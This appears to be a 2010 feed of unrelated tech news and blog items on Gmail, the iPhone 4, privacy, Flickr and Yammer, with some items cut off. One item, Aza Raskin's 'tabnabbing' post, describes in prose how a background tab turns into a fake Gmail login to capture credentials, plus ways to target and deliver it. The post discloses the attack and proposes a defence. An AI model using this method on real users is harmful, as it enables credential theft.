Email

Slap a Map Across Your Gmail or Buzz —

Google announced today that it has enabled a Google Maps preview in both Gmail and Google Buzz.

Now, instead of pasting a Google Map into an email you send, any Google Maps URL and any U.S. address (for the time being) you enclose will automatically come with a map embedded.

Sponsor

To enable the function in your Gmail, click the Google Labs setting tab and select "Google Maps previews in mail." Once that is functional, any Google Maps URL will be mapped. For the time being, only U.S. addresses are being extracted, but, according to Google software engineer, Mark Knichel, they are working on giving the extraction process a global reach.

When it comes to Google Buzz, pasting a Google Maps link into the post box will cause the system to automatically produce an image preview of that location.

Discuss

The iPhone 4 is here now and it's all that we had hoped for and...well, that's about it. Apple's now predictable keynote began with stats, ended with "one more thing" and detailed a few highlights throughout regarding the company's latest creation, the iPhone 4.

But one thing didn't happen today: we weren't blown away. We weren't surprised. We didn't jump up and down, screaming. We don't even know if we'll rush right out and get one.

In fact, we might just skip the iPhone altogether and get an Android phone instead.

Sponsor

Blame Gizmodo if you will, for spoiling all our fun with their spy shots of the iPhone prototype "found" in a bar. But we don't think that was the problem. No, the problem is that iPhone has lost its edge. Meanwhile, Android is killing it.

iPhone 4 or Android?

Case in point, here's the conversation this blogger had with the spouse:

Me: It's only $199 to upgrade my iPhone!

Him: Is it 4G?

Me: No.

Him: What's cool about it?

Me: Um, it's got a better camera. And it's faster. And it's has a 3-axis gyro thingy.

Him: What's that?

Me: This thing for games, it helps when you rotate the phone, the game rotates.

Him: That's cool, but you don't really play games, do you?

Me: Not really. But it has HD video recording!

Him: So does your camera.

Me: And threaded email...And video chat!

Him: Over 3G?

Me: Well, no. Over Wi-Fi. And only with other iPhones. But EVO has Qik, and that works over 4G, actually. Hmm, maybe I should just get an EVO.

In fact, maybe I just will.

While I'm at it, here are a few more things that Apple didn't announce today:

1. 4G

No, it was not the "iPhone 4G," it was the iPhone 4. Why? Because AT&T isn't set to roll out its 4G network until next year. And Apple didn't surprise us by finally confirming the mythical Verizon iPhone, not that we expected it at this point. But still. Where's my iPhone 4G already?

2. Cloud iTunes/OTA Sync

Sure, Apple just bought Lala.com, but couldn't they have at least teased us about the forthcoming "cloud iTunes?" After all, that's what Google did. At its recent I/O conference, Google announced that an upcoming version of the Android Market would allow music and app downloads and automatic over-the-air sync. Is Apple even thinking about doing this? We have no idea.

3. 3G Video Chat

FaceTime, Apple's new mobile iChat-like application, will probably be fun, but it's not game-changing. It only works over Wi-Fi for one thing (thanks, AT&T), not 3G. Meanwhile, Qik and Fring already have video chat apps for Android and Skype is hinting at an Android app arriving this year. Oh, and Qik on EVO offers 4G video chat, too.

4. Mobile Hotspot

In the current version of the Android operating system (the operating system!), there's a feature that lets an Android phone function as a mobile hotspot. Carriers can choose to implement this feature or not. The iPhone, meanwhile, can be tethered for $20 extra per month via USB or Bluetooth on AT&T.

5. Free MobileMe

Apple wants to compete with Google, but still charges $99/year for MobileMe (for the smallest package) while Google gives away its low-end services for free. That's not working for us either.

6. Voice Input

Trying to stop your dangerous texting while driving habit? Better get an Android phone. Although universal voice input is probably coming to the iPhone thanks to Apple's acquisition of Siri, a cutting edge, voice-based digital assistant, it's not here yet. When it is arriving, though? Apple's reluctance to disclose future plans has us again, looking to Android, which does this right now.

7. Free navigation

Navigation on the iPhone? There's an app for that! *Yep, but it's not free. Google, meanwhile, offers Google Maps Navigation for free on all Android phones. Apple, either provide your own app or make nice with Google and use theirs, for goodness' sake.

8. Dashboard

We were halfway hoping that the recent news about Apple killing off all the "dashboard" apps on the iPhone and iPad meant the company was going to launch its own dashboard-like app similar to Android's widgets. Guess we were wrong here, too.

Conclusion?

All this being said, the iPhone 4 is still a great smartphone thanks to other hardware-based innovations like its "retina display" (326 pixels per inch!), its integrated antennas, and its glass and stainless steel casing housing the thinnest iPhone to date: 9.3 mm thick. But maybe now that the hardware has been modernized, maybe Apple can focus on the software?

Discuss

 Adam Lisagor makes some astute points based on hie recent use of iPad as a TV device:

iPad TV

However, when the iPad came, I found myself watching TV shows more often on it than on my TV. My preferred experience is to obtain TV content on my Mac, use software like the brilliant Air Video to convert it on-the-fly and stream it to my iPad, and watch in bed with my headphones while my girlfriend sleeps or watches her stories. If this isn’t the most thoroughly engaging way to take in video, I don’t know what is. And funny enough, when it’s time for a communal viewing experience, we’ll put it on the good ol’ TV.

What I started to notice about those newly rare occasions when the TV came back on, aside from their quaintness, was how much TV viewing actually promotes passivity in viewership. I feel my body become inert, my eyes, focused on a plane at a middle distance, I feel a tangible blankness to the experience, as though I’m close enough to partake, but far enough not to have to engage. I exit my body and look at myself from the outside, a 30-yard expressionless stare, and it’s a wonder we’ve let this thing dictate such vast portions of our lives for so long. Not to get all heavy.

Contrast that with the physical positioning of a personal video screen like the iPad, where our focus is forced to converge at a plane we’re more accustomed to for active participation, like reading or email or work or cat videos. I’m no scientist, but I’m guessing there are some psychological implications to the distance at which our eyes spend their time focusing as we engage with the world. And to my mind, holding a 10” screen a foot from my face in a dark room is more immersive than staring blankly at a 40” screen twelve feet away.

My point is, different-sized screens will always play roles in our media diets. But we should expect those roles to shift as technology does.

Cognitive scientists have learned that we reason differently when reading on our computer than when reading books (see Lifestreaming At The Edge), apparently engaging more of the 'executive function' that involves more crititcal thinking. Perhaps there is a similar effect here, where changing the nature of the experience changes in a basic way how we process it, and the nature of the benefits.

I also like Adam's conjectures about the direction for Apple TV, and how it might play with iPad. I am still holding off on the iPad until it has a webcam in it, though.

Apple to Flurry: Kiss Our Data Good-bye —

Much of the great mobile data we analyze comes from analytics firms, among them Flurry, which entices developers to use tracking codes within mobile applications that its software captures and sends back to the company. Flurry then uses the data to provide detailed information on, for example, which handset makers have the most market share or what platforms have the most apps. Based on comments made by Steve Jobs last night at the All Things D conference, however, when it comes to the iPhone, that practice is about to undergo a major change.

When asked about handset analytics, Jobs specifically mentioned Flurry by name:

“Some company called Flurry had data on devices that we were using on our campus — new devices. They were getting this info by getting developers to put software in their apps that sent info back to this company! So we went through the roof. It’s violating our privacy policies, and it’s p***ing us off! So we said we’re only going to allow analytics that don’t give our device info — only for the purpose of advertising.”

The situation has Jobs upset for at least two reasons: First, companies like Flurry (and developers that use Flurry’s services) don’t have to wait around at a bar to find out about the next super-secret iPhone — by collecting device data through installed software, analytics firms can glean Apple’s future hardware and software plans in advance. Secondly, there’s no simple opt-out method for consumers, who may not even realize that their device-specific data is going to a third-party.

Flurry’s VP of marketing, Peter Farago, told Om via email that that Flurry is changing practices in light of Apple’s position — and to some degree, has done so prior to Jobs calling out Flurry last night. Indeed, on May 13, Flurry announced a Privacy First Initiative “aimed at increasing consumer privacy standards in mobile application data collection and targeting.” Clear opt-out messages, non-granular geographic data and data deletion are among the new privacy activities that will take effect this summer.

That may help stem Jobs’ anger for now, but it wouldn’t surprise me if Apple continues to further clamp down on third-party analytics activities. Flurry says that it will comply with Apple’s wishes and no longer provide aggregated usage statistics, but if that’s the case, it will lose one of the most valuable pieces of its current offerings.

Related GigaOM Pro content (sub req’d):

How iAd and the iPad Will Change Mobile Marketing

Disclosure: The GigaOM iPhone application uses Flurry to track application usage metrics.

---

We’re adding broadband connections to our televisions, our phones, our reading devices and our game consoles these days, to the point that we expect such connections in almost everything we own. But while connectivity is awesome 90 percent of the time, it’s also scary because it can turn what were once private habits such as reading a book or answering email into something social — in some cases, without us knowing.

It also allows advertisers to better track our activities and to offer up personalized ads. Thanks to more gadgets with a web connection, we all live in glass houses where friends, neighbors, advertisers and potentially the government can see what we’re up to. What’s worse is that the records of our daily activities aren’t a transitory blip; they’re kept for months on end and can be searched, resold or shared.

Sure, your glass house has a great view of the world, and the ability to let your friends know what TV show you’re watching so they can share the experience is nice. But sometimes — perhaps for no other reason that a desire to be alone — you might want to close the drapes.

I place very high value on the notion of privacy. It disturbs me to find that Amazon might be sharing my anonymized highlighting of my Kindle books with the world — not because I’m learning how to make a bomb or reading Harlequin romance books — but because reading is a private activity for me. I’m similarly disturbed when a company that’s already pushing my comfort zone on privacy says one thing, but is apparently doing another.

If we’re going to live in glass houses, here’s what we need as connected consumers:

Transparency: Services shouldn’t say one thing but do another. Nor should they explain what they share in convoluted or complicated terms. And given how fast things change online, when privacy policies are amended, users need to be explicitly told (GigaOM Pro, sub req’d).

Standards: We need the companies that want to use and share our information to agree on terms, and market the heck out of them as a means to educate consumers. IP addresses, for example, are generally considered anonymous but they can be traced back to a household. Consumers need to know that. They also need to get a real sense of other potentially invasive ways tech can track them and understand which ones matter. Having a unified schema for entering and storing data would also help because it would enable users to move their information to other providers and perhaps shop around on the basis of privacy.

Control: I think we’re in many ways having the wrong debate over privacy. Most people don’t know what’s being shared, which means they don’t know what to do about it and instead, just freak out. If you give people information in a standardized format suddenly they can have control — they can decide what to share and with whom.

Having control may not mean that a consumer opts into sharing information through an arduous, click-filled process, but with enough transparency and standard language, can tell immediately what’s going to be shared upon signing up. In many ways the Internet is about the ability to access information or services easily and virally, and opt-ins create a barrier to entry that’s pretty high for businesses. Plus, the expectation that has developed around the Internet is that it’s easy to sign up and share information, but you need to clearly tell people what’s happening and offer them a way out before they share more than they intended.

A Line of Demarcation: How much someone is willing to share online is pretty personal. Already I share more online than I ever thought I would, while I’m sure my daughter, who is now three, will share even more. But as we connect financial and health information to the Internet through broadband-connected medical devices and online health records, we need to set limits as to who owns those records and how they can be accessed.

I think that data should belong explicitly to the user and methods to read it should be interoperable so that it can be shared at will with service providers when needed, while the user retains control. There is no sharing without an explicit opt-in.

Clearly this isn’t going to stop egregious violations of privacy, such as photos of a dead teen being posted online despite the family’s wishes, and it doesn’t mean one shouldn’t exercise common sense when, say, pondering whether or not you should post that pic of your friend drinking.

One way or another, instead of debating the nebulous issue of whether we share too much, we need to talk about how to set standards and educate consumers. Only then will we be able to have a healthy debate over what privacy practices we need in a connected age. We live in glass houses — let’s accept that and start shopping for blinds.

Image courtesy of Flickr user seier+seier

---

If You Like Moustaches on Men - You'll Love These Restaurants —

Cross reference a person's Twitter friendships with their Foursquare favorites with their Hunch.com articulated "taste graph" and what do you get? Interesting personalized restaurant recommendations, for one thing.

Taste-gathering startup Hunch is experimenting with a recommendation service that cross references social graph connections on other services with the large set of unusual questions its users have answered. Questions like "do you like facial hair on men? Yes? Well, 48% of our users have said that." The end result is a simple prototype website where you enter a city and your Twitter username and Hunch will show you Foursquare venues it thinks you'll like. Or at least it thinks that people on Hunch who are like your friends on Twitter tend to like those places, on Foursquare. Crazy? Maybe not.

Sponsor

Above: Hunch has reason to believe that my friend Rick Turoczy would like the high-end restaurant Toro Bravo, but believes that I would not. Perhaps Hunch is calling Rick a snob.

Restaurant recommendations are just the beginning. Hunch knows a lot about a lot of people. The company recently said that the average Hunch user has answered 152 personal questions about themselves. Now that data and our corresponding friend connections are going to be the basis for personalized recommendations. Want to see how well the company thinks it understands you? Check out the recently launched Hunch Twitter predictor game. It's downright eerie.

Hunch co-founder Chris Dixon explained (vaguely) what's going on by email.

We developed the technology to project and propagate our taste data using graph-like connections via public APIs. In this case we propagate our taste profiles to Twitter by projecting the subset of Hunch users connected with twitter onto all Twitter
users. Then we propagate this taste data to Foursquare by projecting the subset of Twitter users checking in on foursquare onto all Foursquare venues. With our collection of taste profiles, in real time we can calculate affinities between any Hunch user, Twitter user, and Foursquare venue. As we project and propagate across all the web's entities, we will enable crazy data mashups. It's going to be cool!

In other words, if Hunch doesn't know about you well enough to make Foursquare recommendations via a Twitter account that's tied to both Foursquare and Hunch, then it will assume you are like those Twitter friends of yours who are on Hunch, and Foursquare.

That's the kind of data-driven value that making all these connections explicit will allow. The future will look like a big algorithm and interface war between companies battling it out to better serve you based on commonly, publicly available user data. Or data you selectively expose in return for recommendations.

Discuss

Google Wave is now officially one year old today, but despite Google’s admirable year long dedication to Wave as well as opening it up to anyone with a Google account last week at Google I/O, we’re wondering if people are ever going to show up to the party.

Yes, Google has gone to great lengths to say that Wave is being used by schools, for collaboration, at conferences, etc, but many of these uses seem to be for academics/education, and not the general public. Certainly, people receive a better education when they collaborate, but there were plenty of existing online collaboration tools available to educators long before Wave debuted. Heard of IM?

Doesn’t really meet a need

Wave has the same problem one year in as it did when it launched – it doesn’t really meet any real needs. We have phones, Skype and IM for real-time communication, we’ve got Google Docs to collaboratively edit docs online, we’ve got picture and video sharing services, and yes, we have email, which in case you haven’t forgotten was supposed to be made obsolete by Wave. Even a one year old can figure out that that hasn’t happened.

To help the earthquake response in Haiti, Crisis Camps sprung up all over the world to crowdsource and map information coming from the disaster zone. During the first day of camps, many people suggested that volunteers use Wave to collaborate, but it quickly became apparent that it just didn’t do anything better than other existing tools (including Etherpad, which Google acquired to integrate into Wave). It’s true that a few people did decide to push forward using Wave, but the vast majority of the volunteers didn’t.

That said, we at The Next Web use Wave to coordinate our weekly podcast – but while it does the job, it doesn’t particularly do the job better than email or our internal social network would.

It’s just an experiment, live with it

Wave is an experiment, and Google would be best served if it keeps that in mind. Perhaps it will attract a loyal following among academics and educators, and frankly, that’s not a bad thing – online collaboration software for education is a big (not Google big, but still big) business and if Wave can help people to get a better education, then it will have found a noble existence.

However, Google is in the fight of its life with Apple right now, and it needs to focus its energies like never before, so most likely Wave will never get out of Labs, will get a cult following from people that get it and that will be it. Email is safe for awhile yet.

If Google continues to push Wave as a revolutionary product that everyone will one day use, on the other hand, they could end up with cake on their faces.

Image

Another longtime Yahoo exec is departing–this time Tapan Bhat (pictured here), who had purview over the Internet giant’s important front page.

The news of the departure came in an internal email from new Chief Product Officer Blake Irving, titled “Busy Week” that highlighted the Yahoo (YHOO) investor day that took place yesterday.

Buried at the end of the memo was a paragraph noting “there’s always a downside to a productive week,” and saying that Bhat had decided to leave the company.

Bhat’s team will report to Yahoo exec Jeff Kinder until a replacement is found. It is not clear

Bhat joins a number of top execs who have recently clocked out of Yahoo of late, such as U.S. advertising head Joanne Bradford.

Bhat was in charge of a range of products at Yahoo, most importantly, the most recent redesign of its powerful homepage a year ago.

Yahoo has since confirmed the departure.

“Tapan Bhat, SVP, Integrated Consumer Experiences, has decided to leave Yahoo!. Tapan has been an integral leader within the Products organization since joining Yahoo! more than five years ago and we value his many contributions and wish him well. His last day will be June 15.

And from Bhat:

“Leaving Yahoo! has been a difficult decision to make because I’m incredibly proud of the work that’s been accomplished by my teams over the last five years, particularly related to the Yahoo! homepage, My Yahoo!, our content optimization engine and most recently, our Mobile and iPad apps. I’m looking forward to new challenges that lie ahead and am confident that I’m leaving Yahoo! on the right path, and with the right leadership in place.”

According to some sources inside and outside of Yahoo, Bhat has clashed with CEO Carol Bartz at times, and also has long been considering a new move.

Tetris Clones Pulled From Android Market — sbrubblesman writes "The Tetris Company, LLC has notified Google to remove all Tetris clones from Android Market. I am one of the developers of FallingBlocks, a game with the same gameplay concepts as Tetris. I have received an email warning that my game was suspended from Android Market due to a violation of the Developer Content Policy. When I received the email, I already imagined that it had something to do with it being a Tetris clone, but besides having the same gameplay as Tetris, which I believe cannot be copyrighted, the game uses its own name, graphics and sounds. There's no reference to 'Tetris' in our game. I have emailed Google asking what is the reason for the application removal. Google promptly answered that The Tetris Company, LLC notified them under the DMCA (PDF) to remove various Tetris clones from Android Market. My app was removed together with 35 other Tetris clones. I checked online at various sources, and all of them say that there's no copyright on gameplay. There could be some sort of patent. But even if they had one, it would last 20 years, so it would have been over in 2005. It's a shame that The Tetris Company, LLC uses its power to stop developers from creating good and free games for Android users. Without resources for a legal fight, our application and many others will cease to exist, even knowing that they are legit. Users will be forced to buy the paid, official version, which is worse than many of the ones available for free on the market. Users from other countries, such as Brazil in my case, won't even be able to play the official Tetris, since Google Checkout doesn't exist in Brazil; you can't buy paid applications from Android Market in these countries."

Read more of this story at Slashdot.

Unlock Your Hotel Room with Your Cell Phone —

Unlock Your Hotel Room with Your Cell Phone is a post from Chris Pirillo

I hate traveling. I love the places that I visit and the people I interact with when I get there. It’s the actual travel part that gets to me every time. There’s always such a rush to do everything, you know? Checking into my hotels is probably my least favorite task. God love ‘em for what they do, but the desk clerks always make me batty. They’re always so helpful and happy. I know, it’s a good thing that they’re good at what they do. But when I check in, I’m usually frazzled and just want to pass out on my bed. Like all of you, though, I have to stand in line and then go through the entire process while talking to someone who is entirely too perky. InterContinental Hotels understands my frustrations, and is working on a plan to change things drastically.

Next month, InterContinental Hotels Group will start testing new technology at two of their Holiday Inn locations which allows guests to use their smartphones to unlock the doors to their rooms.

IHG exec Bryson Koehler thinks that the phones may be the perfect answer for weary (and harried) travelers. “The proliferation of smartphones is growing in such a way that we have to look at what people are already bringing with them to make their stay more enjoyable,” he said. “We don’t need to burden people with additional items; it just clutters up their lives. The beauty of the smart phone is that they’ve already got it.”

The test will begin in June at the Holiday Inn Chicago O’ Hare Rosemont and the Holiday Inn Express Houston Downtown Convention Center. To join the trial, participants will need to download an Open Ways app to their phone. Guests will call up the confirmation email on their screen and hold it up to a sensor on the door which will automagically unlock it.

What are your thoughts on this? If you have a smartphone and travel often, is this something you feel you would take advantage of?

• Should Yahoo!s Carol Bartz keep her job?
• Could today be a day in paradise for you?
• Is the Dell Streak competition for the iPad?
• What wireless router are you using in your home?
• Put your hands together and clap – Apple has dropped the “I’m a Mac” ads.
• What home security tips have you overlooked?
• If you have trouble keeping your mind in check, Scattrbrain may be your answer.
• Did a TSA employee steal identities?
• What would you do if you were in that situation?
• Is Facebook a dictatorship?
• Is there any honesty in the swimwear business?
• Teens: You CAN achieve anything you set your mind to. I promise.
• How do you provide your employees with meaningful feedback?
• Microsoft is warning of a major increase in rootkits.

You won’t need a smartphone OR a hotel stay to grab the hottest software and apps for your computers and mobile devices.

• Bartz Curses Arrington at TechCrunch Disrupt
• New Facebook Privacy Settings Tomorrow
• You Demand, Facebook Listens
• Facebook and MySpace are Giving Away Your Information to Advertisers
• How Private is Facebook?
• Search Your Public Facebook Updates
• How to Protect Your Privacy Online
• Facebook and Privacy: Will the Twain Never Meet?
• Facebook Serves Up Unwanted Apps
• The Seattle Social Community is Growing

Filed under: Internet, Security, Browsers

By now, all but the most geriatric Web users know about phishing. Usually it takes the form of a seemingly-official email from a bank or other money-related Web service. Most of the time these attacks are painfully obvious -- but what if you removed the email attack vector? What if you removed those daft give-away URLs? What if the phishing attack was pure, seemingly-benign JavaScript that's invisible to all but the most judicious of Web users?

That's exactly what 'tabjacking' does. Open Aza Raskin's proof of concept in a new tab. Admire the sample code. Now, change tabs, wait five seconds, and then watch in horror as his site seemingly becomes GMail.

Malicious JavaScript injection isn't a new thing -- and this particular exploit only works in Firefox (and partially in Chrome) -- but you have to admit it's pretty damn scary. It's certainly only a matter of time until workarounds are found for the other browsers -- and the implications when combined with targeting 'hacks' such as CSS history mining are petrifying.

You wouldn't have to hack the site to inject the JavaScript either: an add-on or extension would work just as well...

If you're like me, I always check the address bar before typing a sensitive password. I'm not actually sure what I'll do, now that tabjacking code is in the wild.

As Aza says, it's high time we move to browser-based authentication solutions like the Firefox Account Manager.

Tabjacking: a new and ingenious phishing attack originally appeared on Download Squad on Tue, 25 May 2010 11:00:00 EST. Please see our terms for use of feeds.

Read | Permalink | Email this | Comments



Phishing - Aza Raskin - Download Squad - JavaScript - Uniform Resource Locator

In a surprising turn of events Facebook CEO Mark Zuckerberg has responded personally to the recent privacy complaints.

Facebook has been through an intense week of criticism and debate over its privacy issues and recent move to make everyones Facebok info public unless they choose to flick them back again – something which is unfortunately not every easy to do.

In an email to tech celeb Robert Scoble, Zuckerberg says that the company will be announcing changes this week and wants to make sure that they “get this stuff right this time”.

There are two ways to see this form of personal response. One, as one commenter put it, Zuckerberg is using Scoble as a tool to essentially put himself and Facebook in a better light with early adopters and tech fanatics (most of Scoble’s readers and followers are). The other is to see this as a genuine attempt to accept there have been problems and  reach out to calm fears by personally contacting someone who Zuckerberg knows many (of the right) people trust.

Full email posted below, more discussion from us to come.

Hey,

We’ve been listening to all the feedback and have been trying to distill it down to the key things we need to improve. I’d like to show an improved product rather than just talk about things we might do.

We’re going to be ready to start talking about some of the new things we’ve built this week. I want to make sure we get this stuff right this time.

I know we’ve made a bunch of mistakes, but my hope at the end of this is that the service ends up in a better place and that people understand that our intentions are in the right place and we respond to the feedback from the people we serve.

I hope we’ll get a chance to catch up in person sometime this week. Let me know if you have any thoughts for me before then.

Mark

Microsoft is losing two high-profile executives. Both J. Allard, "Chief Experience Offer" and Entertainment and Device Division's CTO, and Robbie Bach, President of Entertainment and Devices Division, are leaving the company per a Steve Ballmer email from this morning. These are the guys behind the Xbox, Zune, Project Natal, and the dead Courier project -- so basically all of Microsoft's hit entertainment projects from the last decade.

From: Steve Ballmer Sent: Tuesday, May 25, 2010 11:01 AM To: Microsoft - All Employees (QBDG) Subject: Executive Leadership Transitions After almost 22 years with the company, Robbie Bach has decided to retire from Microsoft. I have worked with Robbie during his entire tenure at Microsoft, and count him as both a friend and a great business partner and leader. Robbie has always had great timing, and is going out on a high note - this has been a phenomenal year for E&D overall, and with the coming launches of both Windows Phone 7 and "Project Natal," the rest of the year looks stupendous as well. While we are announcing Robbie's retirement today, he will remain here through the fall, ensuring we have a smooth transition.

A New Type of Phishing Attack —

The web is a generative and wild place. Sometimes I think I missed my calling; being devious is so much fun. Too bad my parents brought me up with scruples.

Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site.

What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise.

How The Attack Works

1. A user navigates to your normal looking site.
2. You detect when the page has lost its focus and hasn’t been interacted with for a while.
3. Replace the favicon with the Gmail favicon, the title with “Gmail: Email from Google”, and the page with a Gmail login look-a-like. This can all be done with just a little bit of Javascript that takes place instantly.
4. As the user scans their many open tabs, the favicon and title act as a strong visual cue—memory is malleable and moldable and the user will most likely simply think they left a Gmail tab open. When they click back to the fake Gmail tab, they’ll see the standard Gmail login page, assume they’ve been logged out, and provide their credentials to log in. The attack preys on the perceived immutability of tabs.
5. After the user has entered their login information and you’ve sent it back to your server, you redirect them to Gmail. Because they were never logged out in the first place, it will appear as if the login was successful.

We’ll call this new type of phishing attack “tabnabbing“.

Targeted Attacks

There are many ways to potentially improve the efficacy of this attack.

Using my CSS history miner you can detect which site a visitor uses and then attack that site (although this is no longer possible in Firefox betas). For example, you can detect if a visitor is a Facebook user, Citibank user, Twitter user, etc., and then switch the page to the appropriate login screen and favicon on demand.

Even more deviously, there are various methods to know whether a user is currently logged into a service. These methods range from timing attacks on image loads, to seeing where errors occur when you load an HTML webpage in a script tag*. Once you know what services a user is currently logged in to, the attack becomes even more effective.

You can make this attack even more effective by changing the copy: Instead of having just a login screen, you can mention that the session has timed out and the user needs to re-authenticate. This happens often on bank websites, which makes them even more susceptible to this kind of attack.

Attack Vector

Every time you include a third-party script on your page, or a Flash widget, you leave yourself wide open for an evil doer to use your website as a staging ground for this kind of attack. If you are the evil doer, you can have this behavior only occur once in a while, and only if the user uses a targeted service. In other words, it could be hard to detect.

You can also use a cross-site scripting vulnerabilities to force the attack to be performed by other websites. And for browsers that do not support changing the favicon, you can use a location.assign call to navigate the page to a controlled domain with the correct favicon. As long as the user wasn’t looking at the tab when the refresh occurred (which they won’t be), they’ll have no idea what hit them. Combine this with look-alike Unicode domain names and even the most savvy user will have trouble detecting anything is amiss.

Try it Out

You can try it out on this very website (I’ve only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.

It’s hard to find, isn’t it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.

You can get the source code here: bgattack.js.

The Fix

This kind of attack once again shows how important our work is on the Firefox Account Manager to keep our users safe. User names and passwords are not a secure method of doing authentication; it’s time for the browser to take a more active role in being your smart user agent; one that knows who you are and keeps your identity, information, and credentials safe.

No related posts.

Is the iPhone Heading to Sprint? —

Is the iPhone Heading to Sprint? is a post from Chris Pirillo

Rumors have been floating around the Internet for what seems like forever, speculating as to when the iPhone will appear on the Verizon network. Today, however, TechUpdate says that the phone will be heading to Sprint sometime this summer. According to the story, a Best Buy employee in Pennsylvania told them that displays for the “iPhone 4G” will hit the shelves about the time that WWDC begins. Could this be true?

While I’m not sure we can believe some anonymous Best Buy employee, it does make sense to me. Sprint boasts the only 4G network thus far, offered in selected cities of United States which gives speeds of up to 10 Mbit/s. If the rumor is true, this means that a purported 4G iPhone would actually live up to its name. According to an email received by TechUpdate president Henry D’Andrea:

They’ve begun to grease the wheels for advertising. There is no news in regards to a Verizon version however. In regards to why it is moving to another carrier, our mobile manager speculates that Apple wanted to drop AT&T due to their poor service but managed to opt-out of the rest of their contract in exchange for the iPad service deal.

There is, of course, no proof given to back up these statements. The employee states he cannot supply it due to “privacy concerns” with their vendors. He also refused to identify which Best Buy he works for, in order to remain anonymous… and to keep his job, I’m sure. It will be interesting to see how this develops in the coming weeks.

What do you think? Will we be seeing the iPhone on the Spring network in the near future?

• Mark Zuckerberg finally admits to mistakes.
• Keep everything in life as simple as possible.
• Is Flash “flashy” enough?
• Seagate delivers with hybrids.
• Could Netflix be talking about HTML5?
• If you could be the boss at Microsoft for one day, what changes would you make?
• Are hybrid and electric cars a hazard on the road due to their quiet nature?
• Did you have to make changes in your budget and lifestyle to be able to afford expensive geeky gadgets?
• How do you view .PDF documents on the iPad?
• Not all economic news these days is bad.
• Which is your favorite video recorder these days?
• Can your webcam be hacked?
• What flavors of Linux have you sampled lately?
• What is the smartest Firefox addon?
• How do you protect yourself from a computer virus attack?
• iPads are banned at Yankee Stadium.
• What are the top five excuses for missing work?
• What is the quickest way to visit your favorite websites?

There are no surprises in store when you visit our software center. You’ll find the hottest software and apps for all of your devices… nothing more, nothing less.

• AT&T Abuses “Valued Customers” Over Verizon iPhone
• AT&T Ranks Dead Last for Customer Satisfaction
• Is the School Spying on Your Child?
• iPhone to Verizon? Not Anytime Soon
• What Tech Do You Want?
• Unboxing the iPhone 3G S
• Are all iPhone Problems Apple’s Fault – or AT&T’s?
• Make a Backup of Your iPhone / iPod Touch / iPad Apps List
• Which iPad Should I Buy?
• Is Jailbreaking an iPhone or iPad Bad?

See that photo above?

It’s by a famous artist Jules-Joseph Lefebvre and hangs in the Art Institute of Chicago. It was painted in 1874. I took it last year when I visited the museum. It’s also a photo of mine that is presently being censored by Flickr. Apparently showing full frontal cock on Michelangelo’s David on Flickr’s ok, but showing the backside of a woman from a 1874 painting is not. After they censored it I sent them an email saying, “c’mon guys, really?” trying to have the censorship decision appealed. But after getting my email they told me that it needed to remain censored.

So let me ask you this. Which is more offensive, a photograph from a painting in a public all ages gallery in one of the finest cultural institutions in the world, or Yahoo CEO Carol Bartz very publicly telling Mike Arrington to “Fuck Off” at a crowded technology conference?

Another friend of mine had over 25,000 photographs of mannequins online. Flickr didn’t like that some of his mannequins apparently showed a little nipple so they just censored all 25,000 photos in his stream. Wouldn’t want anyone being offended now by seeing a little nipple on a mannequin that sits on a public street seen by thousands of people a day.

So I guess it’s ok for a CEO to say “Fuck Off,” a phrase that surely is offensive to some. But it’s not ok for users of her site to do things like say publish photographs of paintings or plastic mannequins. Personally I don’t give a fcuk if Carol says fkuc as much as she fukin wants. But I think it’s a bit hypocritical for her to allow the censors at her Flickr site to censor things that are far less offensive. And it might be nice to have the fukcin picture above uncensored, thanks.

You can watch Carol tell me to “fuck off” below yourself if you’d like:

Yammer has decided that they are going to go down the old Basecamp path, and force people who work with different companies to have separate logins:

via email

Dear Stowe,

We want to make you aware of a change to Yammer that will have an impact on you. You currently have more than one email address registered to your Yammer account. We've decided to move to a one-email-per-account model. This means that we will soon remove secondary email address(es) from your account.

Why are we doing this?

As Yammer evaluates its plans for future product features, we've realized that allowing users to have more than one email address linked to their account could result in potential problems. For example, admins from different networks might seek to apply conflicting settings to an account which is in both networks. There could also be confusion between work and personal Yammer accounts. We believe that cleanly separating Yammer accounts based on one email address per account is the best way to avoid these problems from occurring in the future.

How does this affect you?

• We will create a separate Yammer account for each of the following company email addresses that you have: stowe@js-kit.com and stowe@ninety10group.com
• When you want to switch between these Yammer accounts you must first log out and then log in with one of your other email addresses.
• Your same password will be securely copied to each of your new accounts.
• Soon, our desktop and iPhone applications will allow you to be logged into more than one account at the same time. Just register each account on the application and you will be able to toggle between accounts.

If you have any questions or concerns, please contact help@yammer.com

We appreciate your patience, and apologize for any inconvenience that this change causes you.

 

Thanks for using Yammer,

The Yammer Team

 

This is a particularly bad move. First of all, it will lead to the same Federation of Work problems that I wrote about years ago vis-a-vis Basecamp:

Basecamp and The Federation Of Work

I have run up against what I think is a basic flaw in the Basecamp model.

Many times in the past few months, I have started a project up with a group, or groups, who like me are already using Basecamp. The problem that arises: Whose Basecamp implementation to use?

I would, of course, rather manage projects that I am involved with in my own Basecamp instance, while the others have the same perspective. But what happens, quickly, is that I have a bunch of memberships in other Basecamp projects, which do not collate into a coherent single view.

What's missing is a fundamental insight: the federation of work.

Basecamp lacks the notion of federating project work. While I can invite my pal, Greg Narain, to join a project I am running, Basecamp is only willing to consider Greg as another individual, not as the owner of his own Basecamp instance. As a result, Greg must login to my instance to participate, and the status of the project does not show up on his dashboard.

The solution? 37 Signals should rework their participation model to reflect their new-found success: there are thousands of Basecamp users out there, and more of us will be running into this limitation. More important, perhaps, is that a federated model more accurately reflects the nature of the world. I am involved in a dozen or so projects, and I would like to have a single, coherent view of what's going on across the board, as do all over my partners-in-crime.

Certainly, a single company still needs to be the administrator for each Basecamp project, but that doesn't mean that we need to login at ten different instances everyday.

Basecamp should look at the federation model of Jabber and other successful bottom-up, federated tools. Within Jabber, I can login to my local server, and IM with any other trusted server in the world. The servers simply have to establish a trust relationship. In the Basecamp world, I should be able to invite Greg to participate in a project, and when he agrees, he should be able to simply point at his own Basecamp instance, rather than having to create a brand new, easily forgotten login.

